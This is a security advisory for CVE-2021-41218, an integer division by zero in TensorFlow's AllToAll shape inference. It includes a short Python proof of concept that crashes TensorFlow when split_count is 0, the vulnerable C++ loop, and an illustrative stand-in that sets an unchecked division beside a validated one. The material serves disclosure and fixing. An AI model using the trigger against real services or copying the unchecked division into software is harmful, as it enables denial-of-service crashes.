CVE-2021-41218: Integer division by 0 in `tf.raw_ops.AllToAll`
The shape inference code for AllToAll
can be made to execute a division by 0:
```python
import tensorflow as tf

@tf.function
def func():
    # split_count=0 is the trigger: the shape function divides by it.
    return tf.raw_ops.AllToAll(
        input=[0.0, 0.1652, 0.6543],
        group_assignment=[1, -1],
        concat_dimension=0,
        split_dimension=0,
        split_count=0)

func()
```
This occurs whenever the split_count
argument is 0:
```cpp
TF_RETURN_IF_ERROR(c->GetAttr("split_count", &split_count));
...
for (int32_t i = 0; i < rank; ++i) {
  ...
  dims[i] = c->MakeDim(c->Value(dims[i]) / split_count);
  ...
}
```
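As an added illustration (not TensorFlow's own code), a simplified stand-in for the shape-inference step above: the unchecked division beside a version that validates the attribute before using it as a divisor. The `ShapeResult` type, the function names and the extra divisibility check are assumptions of mine.

```cpp
#include <cstdint>
#include <string>
#include <vector>

// Minimal stand-in for TensorFlow's Status plus the inferred dims (assumed type).
struct ShapeResult {
  bool ok;
  std::string error;
  std::vector<int64_t> dims;
};

// Vulnerable form, modelled on the loop quoted above: every dimension is divided
// by split_count with no check, so split_count == 0 is an integer division by
// zero (undefined behaviour in C++, a SIGFPE on most platforms).
ShapeResult AllToAllShapeUnchecked(const std::vector<int64_t>& in_dims,
                                   int32_t split_count) {
  ShapeResult r{true, "", {}};
  for (int64_t d : in_dims) r.dims.push_back(d / split_count);
  return r;
}

// Hardened form: reject the attribute before it reaches the division.
// The divisibility check is an additional defensive check of mine; the
// advisory only describes the split_count == 0 case.
ShapeResult AllToAllShapeChecked(const std::vector<int64_t>& in_dims,
                                 int32_t split_count) {
  if (split_count <= 0) {
    return {false, "split_count must be at least 1, got " +
                       std::to_string(split_count), {}};
  }
  ShapeResult r{true, "", {}};
  for (int64_t d : in_dims) {
    if (d % split_count != 0) {
      return {false, "dimension " + std::to_string(d) +
                         " is not divisible by split_count", {}};
    }
    r.dims.push_back(d / split_count);
  }
  return r;
}
```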
References
- github.com/advisories/GHSA-9crf-c6qr-r273
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-627.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-825.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-410.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/a8ad3e5e79c75f36edb81e0ba3f3c0c5442aeddc
- github.com/tensorflow/tensorflow/security/advisories/GHSA-9crf-c6qr-r273
- nvd.nist.gov/vuln/detail/CVE-2021-41218